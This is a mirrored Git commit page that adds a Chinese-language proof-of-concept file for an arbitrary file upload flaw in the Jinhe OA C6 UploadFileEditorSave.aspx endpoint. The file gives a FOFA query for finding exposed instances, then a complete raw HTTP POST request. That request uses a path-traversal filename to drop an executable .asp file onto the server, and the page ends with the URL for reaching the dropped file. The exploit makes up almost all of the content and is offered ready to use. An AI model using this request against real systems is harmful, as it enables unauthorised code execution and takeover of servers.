admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create 金和OA_uploadfileeditorsave接口存在任意文件上传漏洞.md

Browse Source
This commit is contained in:
wy876 2024-01-14 19:55:42 +08:00 committed by GitHub
parent 172e7042ab
commit 51d6fa134d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 32 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
金和OA_uploadfileeditorsave接口存在任意文件上传漏洞.md Normal file
View File

@ -0,0 +1,32 @@
## 金和OA_uploadfileeditorsave接口存在任意文件上传漏洞
金和-c6 uploadfileeditorsave 任意文件上传,攻击者可通过此漏洞获取服务器权限
## fofa
```
app="金和网络-金和OA"
```
## poc
```
POST /C6/Control/UploadFileEditorSave.aspx?filename=\....\....\C6\qps4cckjuz.asp HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Connection: close
Content-Length: 191
Content-Type: multipart/form-data; boundary=----9fh1lo9qobtszaiahg6v
Accept-Encoding: gzip, deflate
------9fh1lo9qobtszaiahg6v
Content-Disposition: form-data; name="file"; filename="qps4cckjuz.jpg"
Content-Type: image/png
<% response.write(111*111)
%>
------9fh1lo9qobtszaiahg6v--
```
![image](https://github.com/wy876/POC/assets/139549762/5bb65609-982b-4ebb-9242-3da526eee36b)
访问上传文件路径:
http://your_ip/C6/qps4cckjuz.asp